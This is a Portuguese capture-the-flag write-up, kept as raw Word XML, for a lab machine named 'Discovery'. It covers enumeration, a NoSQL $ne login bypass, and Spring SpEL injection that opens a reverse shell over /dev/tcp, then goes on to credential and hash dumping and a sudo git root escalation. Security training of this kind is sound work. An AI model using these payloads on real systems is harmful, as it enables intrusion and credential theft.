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heading=h.wqimp56c687t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qsw8uvkmwc2v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Discovery.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lg0s3a59tsxs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Vamos iniciar a enumeração da máquina para identificar as portas abertas e serviços em execução utilizando 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Nmap.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nmap -Pn -p- --open --min-rate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1200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-sVC -vvv</w:t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603500"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="2540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identificamos três portas abertas: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22/tcp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(SSH),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(HTTP) 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27017/tcp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(MongoDB).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001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Iniciamos a enumeração pelo serviço web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Ao enviar uma requisição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identificamos que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redirecionava para o domínio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discovery.hc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Para resolver esse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localmente, adicionamos o domínio ao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/etc/hosts.</w:t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 -I &lt;MACHINE-IP&gt;</w:t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33500"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="2540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&lt;MACHINE-IP&gt; discovery.hc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43100"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="2540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partir desse ponto, foi possível acessar a aplicação web.</w:t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95600"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="2540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ponto, realizamos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brute-force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subdomínios e identificamos um novo subdomínio chamado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api.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//discovery.hc/ -H "Host: FUZZ.discovery.hc" -w shubs-subdomains.txt -c -fs 178 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13288"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="2540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Também adicionamos o subdomínio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api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arquivo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/etc/hosts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permitir a resolução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DNS local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possibilitar o acesso.</w:t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3700"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="2540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isso, foi possível acessar o domínio.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Agora, nesse domínio, ao realizar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brute force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endpoints, identificamos a rota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/actuator/env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revelava informações de ambiente, incluindo possíveis variáveis sensíveis utilizadas pela aplicação.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ffuf -u http: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//api.discovery.hc/FUZZ  -w quickhits.txt -c -t 100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263900"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="2540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Conseguimos acessar esse endpoint http://api.discovery.hc/actuator/env.</w:t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05100"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="2540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Nesse endpoint, identificamos o e-mail do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anne.carroll@discovery.hc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a versão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framework utilizado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no caso o Spring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1.0.0-M6.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000038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25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="2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Podemos tentar acessar a aplicação, porém não possuímos credenciais válidas para o usuário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anne.carroll@discovery.hc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65500"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="2540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verificado anteriormente, a aplicação utilizava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 que possibilitou realizar um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bypass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autenticação utilizando operadores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NoSQL,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$ne.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utilização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operador $ne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no parâmetro de senha alterou a lógica da consulta no banco de dados, fazendo com que a condição de autenticação fosse satisfeita sem a necessidade da senha correta. Como resultado, a aplicação considerou o login válido e respondeu com um redirecionamento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(HTTP 302 Found)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sucesso na autenticação e direcionando o usuário para a área autenticada.</w:t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32000"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="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al8dlg7u6at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Ao inserir caracteres especiais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(), "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foi possível provocar um erro na aplicação, que retornou uma mensagem de erro de sintaxe do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Spring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confirmando o uso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framework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previamente identificado na versão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1.0.</w:t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63700"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="2540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essa versão específica do Spring, foi identificada a vulnerabilidade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CVE-2026-22738 (SpEL Injection)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que permite a execução remota de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(RCE)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https://github.com/n0n4m3x41/CVE-2026-22738-POC</w:t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Dessa forma, foi possível explorar a vulnerabilidade de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SpEL Injection,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injetando código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Java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que utilizava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getRuntime()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executar comandos no sistema operacional, permitindo a obtenção de uma reverse shell na porta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443.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"'] + T(java.lang.Runtime).getRuntime().exec(new String[]{'/bin/bash','-c','sh -i &gt;&amp; /dev/tcp/&lt;MACHINE-IP&gt;/443 0&gt;&amp;1'}) + #metadata['"</w:t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33500"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="2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Listamos os arquivos do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 identificamos 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.dockerenv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indicando que a aplicação estava sendo executada dentro de um container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Docker.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Além disso, no diretório atual, foi encontrado um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.env.internal.</w:t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898900"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="2540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 conteúdo do arquivo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.env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revelou credenciais de acesso ao banco de dados, incluindo usuário e senha.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marina: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94jHcDCx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$w8xxBVlQySssVKq</w:t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5900"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="2540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Como a porta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estava exposta, foi possível utilizar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 se conectar diretamente ao banco de dados.</w:t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09700"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="2540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Dentro do banco de dados, listamos as collections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MongoDB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e extraímos credenciais da collection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vault,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onde foi identificado um usuário e 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da senha correspondente.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000065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show collections</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000067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db.vault.find()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006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marina:$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2b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$HJlf66ERtNWkXR.Rj8Oz7O5hUTa8MHdfNW05lv9nv2qca/wQTZBo.</w:t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25600"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="2540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uso 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John the Ripper,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quebrar o hash e obter a senha do usuário.</w:t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marina:bumbum</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000070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john hash.txt –wordlist=~/rockyou.txt</w:t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31900"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="2540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usuário e a senha obtidos, foi possível realizar a autenticação via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959100"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="2540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73100"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="254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usuário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se encontra no diretório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/home/marina.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007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ddfjqv36r5k8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verificamos que o usuário podia executar o comando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sem necessidade de senha.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-l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25400" l="25400" r="25400" t="254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Com base nas técnicas do </w:t>
      </w:r>
      <w:hyperlink r:id="rId33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GTFOBins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para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git,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foi possível escalar privilégios. Criamos um link simbólico e, ao executá-lo com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conseguimos obter acesso como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root.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008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ln -s /bin/sh git-x</w:t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sudo /usr/bin/git --exec-path=. x</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008C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flag 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se encontra no diretório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/root.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009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0500"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="254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36" w:type="default"/>
      <w:headerReference r:id="rId37" w:type="first"/>
      <w:headerReference r:id="rId38" w:type="even"/>
      <w:footerReference r:id="rId39" w:type="default"/>
      <w:footerReference r:id="rId40" w:type="first"/>
      <w:footerReference r:id="rId41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2026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rPr>
        <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
      </w:rPr>
    </w:pPr>
    <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.6vrogorm36q9" w:id="5"/>
    <w:bookmarkEnd w:id="5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27" name="image23.jpg"/>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
              <pic:pic>
                <pic:nvPicPr>
                  <pic:cNvPr id="0" name="image2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6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7">
    <w:pPr>
      <w:rPr/>
    </w:pPr>
    <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
      <w:rPr/>
      <w:pict>
        <v:shape id="WordPictureWatermark1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1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30" name="image29.png"/>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
              <pic:pic>
                <pic:nvPicPr>
                  <pic:cNvPr id="0" name="image29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Discovery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0435"/>
              <wp:effectExtent b="0" l="0" r="0" t="0"/>
              <wp:wrapNone/>
              <wp:docPr id="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04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2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footer" Target="footer2.xml"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image27.png"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer3.xml"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image21.png"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image28.png"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image26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26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image25.png"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image24.png"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image16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6.png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19.png"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image4.png"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image14.png"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image18.png"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://gtfobins.org/gtfobins/git/" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image10.png"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image3.png"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image5.png"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image2.png"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image17.png"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image9.png"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image7.png"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header2.xml"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1.png"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header1.xml"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image30.png"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer1.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image8.png"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header3.xml"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image13.png"/><Relationship Id="rId1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3.jpg"/><Relationship Id="rId2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9.png"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image3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ny7dv5bci8MZ7XZNHvMI3dItw==">CgMxLjAyDmgud3FpbXA1NmM2ODd0Mg5oLnFzdzh1dmttd2MydjIOaC5sZzBzM2E1OXRzeHMyDmguYWw4ZGxnN3U2YXRpMg5oLmRkZmpxdjM2cjVrODIOaC42dnJvZ29ybTM2cTk4AHIhMWlTbnBmNHBhOGhaYWJfTWVnVDVPdXdoNS1qMmxSVzVq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